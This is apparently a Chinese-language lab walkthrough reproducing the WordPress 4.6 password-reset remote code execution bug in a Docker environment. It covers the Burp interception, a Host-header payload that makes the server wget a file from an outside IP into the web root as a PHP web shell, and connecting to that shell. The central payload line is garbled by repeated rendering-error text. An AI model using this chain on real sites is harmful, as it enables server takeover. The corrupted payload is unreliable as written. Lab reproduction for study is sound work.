4.6版本Wordpress漏洞复现

国外的：Wordpress，Drupal，Joomla，这是国外最流行的3大CMS。国内则是DedeCMS和帝国，PHPCMS等。
国内的CMS会追求大而全，而国外的CMS更注重生态，更注重友好的接口，更多的功能留给第三方开发插件来实现。
推荐几个比较新的：ProcessWire，OctoberCMS，CraftCMS

一、搭建环境

进入wordpress里的pwnscriptum里运行docker
docker-compose up -d 拉取环境

扫描一下wordpress的版本，只有4.6及以下的版本才有这个漏洞
wpscan --url http://192.168.25.128:8080/

二、漏洞复现

1.抓包

点击忘记密码，输入刚才创建的用户名或者电子邮箱

开启burp抓包拦截

2.准备payload

Host: aa(any -froot@localhost -be KaTeX parse error: Expected '}', got 'EOF' at end of input: {run{{substr{0}{1}{KaTeX parse error: Expected 'EOF', got '}' at position 16: spool_directory}̲}usr{substr{0}{1}{KaTeX parse error: Expected 'EOF', got '}' at position 16: spool_directory}̲}bin{substr{0}{1}{KaTeX parse error: Expected 'EOF', got '}' at position 16: spool_directory}̲}wget{substr{10}{1}{KaTeX parse error: Expected 'EOF', got '}' at position 8: tod_log}̲}--output-docum…{substr{10}{1}{KaTeX parse error: Expected 'EOF', got '}' at position 8: tod_log}̲}{substr{0}{1}{KaTeX parse error: Expected 'EOF', got '}' at position 16: spool_directory}̲}var{substr{0}{1}{KaTeX parse error: Expected 'EOF', got '}' at position 16: spool_directory}̲}www{substr{0}{1}{KaTeX parse error: Expected 'EOF', got '}' at position 16: spool_directory}̲}html{substr{0}{1}{KaTeX parse error: Expected 'EOF', got '}' at position 16: spool_directory}̲}wutiangui.php{substr{10}{1}{KaTeX parse error: Expected 'EOF', got '}' at position 8: tod_log}̲}192.168.155.2:…{substr{0}{1}{$spool_directory}}payload.txt}} null)
这句话的意思是从192.168.155.2 这个IP地址上下载文件payload.txt 到靶机上的var/www/html目录下的wutiangui.php文件里

3.发送payload

通过BP把一句话木马输入到靶机上，测试一下是否可以通过BP写入成功

4.检查是否上传成功

网页回显没报错，应该成功了
执行后进入以下目录查看
/var/lib/docker/overlay2/b0766f51462cbcb76c2f483c439ab74adce69f6b1f5325b69f67ef889ee3b21e/merged/var/www/html

可以发现生成wutiangui.php

5.连接payload

用御剑连接成功